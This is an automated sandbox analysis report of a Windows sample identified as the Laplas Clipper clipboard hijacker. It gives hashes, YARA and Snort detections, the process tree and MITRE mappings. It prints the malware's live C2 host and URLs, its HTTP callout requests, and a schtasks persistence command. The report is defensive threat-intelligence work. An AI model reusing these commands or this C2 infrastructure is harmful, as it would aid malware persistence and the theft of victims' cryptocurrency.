Edit tour

Windows Analysis Report
Ao88ZLN0Wi.exe

Overview

General Information

Sample Name:	Ao88ZLN0Wi.exe
Analysis ID:	754720
MD5:	24774c7b900e0a51df665776b502cfc9
SHA1:	220db17c0ba6b83ead730bf65c6e34d4da4eadaa
SHA256:	81e9eefec051e50a819e76fa1ec2f088c2e8c5de677537838193cf6c2e5c7584
Tags:	exeLaplasClipper
Infos:

Detection

Laplas Clipper

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Yara detected Laplas Clipper

Snort IDS alert for network traffic

Machine Learning detection for sample

Uses schtasks.exe or at.exe to add and modify task schedules

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Yara signature match

Drops PE files

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

PE file contains executable resources (Code or Archives)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

Ao88ZLN0Wi.exe (PID: 5536 cmdline: C:\Users\user\Desktop\Ao88ZLN0Wi.exe MD5: 24774C7B900E0A51DF665776B502CFC9)

cmd.exe (PID: 2040 cmdline: cmd.exe /C schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 3216 cmdline: schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 15FF7D8324231381BAD48A052F85DF04)

PNcznLwIMl.exe (PID: 5376 cmdline: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe MD5: 6CE4DAC5A778F8E717E5C9C1222AE0DF)

cleanup

Malware Configuration

Threatname: Laplas Clipper

{"C2 url": ["http://clipper.guru/bot/online"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000003.563123119.0000000003230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
00000000.00000002.523036860.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
00000000.00000003.315139514.00000000031B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.637980039.0000000000400000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: Ao88ZLN0Wi.exe PID: 5536	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: PNcznLwIMl.exe PID: 5376	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.Ao88ZLN0Wi.exe.2d10e67.1.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.2.PNcznLwIMl.exe.400000.0.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
0.3.Ao88ZLN0Wi.exe.31b0000.0.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
0.2.Ao88ZLN0Wi.exe.400000.0.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
0.3.Ao88ZLN0Wi.exe.31b0000.0.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
0.2.Ao88ZLN0Wi.exe.400000.0.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.2.PNcznLwIMl.exe.400000.0.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.2.PNcznLwIMl.exe.2d90e67.1.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.3.PNcznLwIMl.exe.3230000.0.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
0.2.Ao88ZLN0Wi.exe.2d10e67.1.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.2.PNcznLwIMl.exe.2d90e67.1.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
6.3.PNcznLwIMl.exe.3230000.0.raw.unpack	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Click to see the 7 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ET TROJAN Laplas Clipper - Regex CnC Request - Source IP: 192.168.2.4 - Destination IP: 45.159.189.115

Timestamp:	192.168.2.445.159.189.11549685802039775 11/27/22-18:21:56.410768
SID:	2039775
Source Port:	49685
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Laplas Clipper CnC Domain (clipper .guru) in DNS Lookup - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.862577532039774 11/27/22-18:21:56.327003
SID:	2039774
Source Port:	62577
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Ao88ZLN0Wi.exe	Virustotal: Detection: 51%			Perma Link
Source: Ao88ZLN0Wi.exe	ReversingLabs: Detection: 41%

Antivirus detection for URL or domain

Source: http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdbjo	Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/online?guid=computer	Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: clipper.guru

Virustotal: Detection: 13%

Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

Avira: detection malicious, Label: HEUR/AGEN.1242346

Machine Learning detection for sample

Source: Ao88ZLN0Wi.exe

Joe Sandbox ML: detected

Source: 00000006.00000002.643112091.0000000013882000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Laplas Clipper {"C2 url": ["http://clipper.guru/bot/online"]}

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Unpacked PE file: 0.2.Ao88ZLN0Wi.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Unpacked PE file: 6.2.PNcznLwIMl.exe.400000.0.unpack

Source: Ao88ZLN0Wi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: 5s8C:\yizija_wimekejepoj47_ceyi.pdb source: Ao88ZLN0Wi.exe, PNcznLwIMl.exe.0.dr
Source:	Binary string: C:\yizija_wimekejepoj47_ceyi.pdb source: Ao88ZLN0Wi.exe, PNcznLwIMl.exe.0.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039774 ET TROJAN Laplas Clipper CnC Domain (clipper .guru) in DNS Lookup 192.168.2.4:62577 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2039775 ET TROJAN Laplas Clipper - Regex CnC Request 192.168.2.4:49685 -> 45.159.189.115:80

Source: Joe Sandbox View

ASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS

Source: Joe Sandbox View

IP Address: 45.159.189.115 45.159.189.115

Source: PNcznLwIMl.exe, 00000006.00000002.643112091.0000000013882000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: PNcznLwIMl.exe, 00000006.00000002.643181685.000000001388A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
Source: PNcznLwIMl.exe, 00000006.00000002.643181685.000000001388A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdbjo

Source: unknown

DNS traffic detected: queries for: clipper.guru

Source: global traffic	HTTP traffic detected: GET /bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: PNcznLwIMl.exe, 00000006.00000002.640242941.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: Ao88ZLN0Wi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000006.00000002.640977716.0000000002B6A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.526585890.0000000002AE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AECCA9	0_2_02AECCA9
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AECD62	0_2_02AECD62
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6ECA9	6_2_02B6ECA9
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6ED62	6_2_02B6ED62

Source: Ao88ZLN0Wi.exe	Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: PNcznLwIMl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: x86 executable not stripped

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

Process Stats: CPU usage > 98%

Source: Ao88ZLN0Wi.exe	Virustotal: Detection: 51%
Source: Ao88ZLN0Wi.exe	ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

File read: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

Jump to behavior

Source: Ao88ZLN0Wi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

Code function: 0_2_02AE87C6 CreateToolhelp32Snapshot,Module32First,

0_2_02AE87C6

Source: unknown	Process created: C:\Users\user\Desktop\Ao88ZLN0Wi.exe C:\Users\user\Desktop\Ao88ZLN0Wi.exe
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_01

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

File created: C:\Users\user\AppData\Roaming\jicTFBavsm

Jump to behavior

Source: Ao88ZLN0Wi.exe	String found in binary or memory: /usr/local/go/src/net/addrselect.go
Source: PNcznLwIMl.exe	String found in binary or memory: /usr/local/go/src/net/addrselect.go

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@7/3@1/1

Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Ao88ZLN0Wi.exe

Static file information: File size 2311168 > 1048576

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: Ao88ZLN0Wi.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x220600

Source: Ao88ZLN0Wi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: 5s8C:\yizija_wimekejepoj47_ceyi.pdb source: Ao88ZLN0Wi.exe, PNcznLwIMl.exe.0.dr
Source:	Binary string: C:\yizija_wimekejepoj47_ceyi.pdb source: Ao88ZLN0Wi.exe, PNcznLwIMl.exe.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Unpacked PE file: 0.2.Ao88ZLN0Wi.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Unpacked PE file: 6.2.PNcznLwIMl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Unpacked PE file: 0.2.Ao88ZLN0Wi.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Unpacked PE file: 6.2.PNcznLwIMl.exe.400000.0.unpack

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AEB89B pushfd ; retf	0_2_02AEB8A2
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AEA0E4 pushfd ; ret	0_2_02AEA12C
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AEADD4 push esp; ret	0_2_02AEADF5
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AEAF2F push esp; ret	0_2_02AEAF7C
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AEAF0D push esp; ret	0_2_02AEAF7C
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6D89B pushfd ; retf	6_2_02B6D8A2
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6C0E4 pushfd ; ret	6_2_02B6C12C
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6CDD4 push esp; ret	6_2_02B6CDF5
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6CF2F push esp; ret	6_2_02B6CF7C
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6CF0D push esp; ret	6_2_02B6CF7C

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe

File created: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: PNcznLwIMl.exe, 00000006.00000002.640242941.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Code function: 0_2_02AE80A3 push dword ptr fs:[00000030h]		0_2_02AE80A3
Source: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	Code function: 6_2_02B6A0A3 push dword ptr fs:[00000030h]		6_2_02B6A0A3

Source: C:\Users\user\Desktop\Ao88ZLN0Wi.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn jicTFBavsm /tr C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f			Jump to behavior

Stealing of Sensitive Information

Yara detected Laplas Clipper

Source: Yara match	File source: 0.2.Ao88ZLN0Wi.exe.2d10e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PNcznLwIMl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ao88ZLN0Wi.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ao88ZLN0Wi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ao88ZLN0Wi.exe.31b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ao88ZLN0Wi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PNcznLwIMl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PNcznLwIMl.exe.2d90e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.PNcznLwIMl.exe.3230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ao88ZLN0Wi.exe.2d10e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PNcznLwIMl.exe.2d90e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.PNcznLwIMl.exe.3230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.527410614.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.563123119.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.523036860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.315139514.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.641488650.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.637980039.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ao88ZLN0Wi.exe PID: 5536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PNcznLwIMl.exe PID: 5376, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 Input Capture	1 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Ao88ZLN0Wi.exe	51%	Virustotal		Browse
Ao88ZLN0Wi.exe	41%	ReversingLabs	Win32.Trojan.MintZard
Ao88ZLN0Wi.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe	100%	Avira	HEUR/AGEN.1242346

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.3.PNcznLwIMl.exe.3230000.0.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
6.2.PNcznLwIMl.exe.2d90e67.1.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
6.2.PNcznLwIMl.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Ao88ZLN0Wi.exe.2d10e67.1.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
0.2.Ao88ZLN0Wi.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.Ao88ZLN0Wi.exe.31b0000.0.unpack	100%	Avira	HEUR/AGEN.1215478	Download File

Domains

Source	Detection	Scanner	Label	Link
clipper.guru	13%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
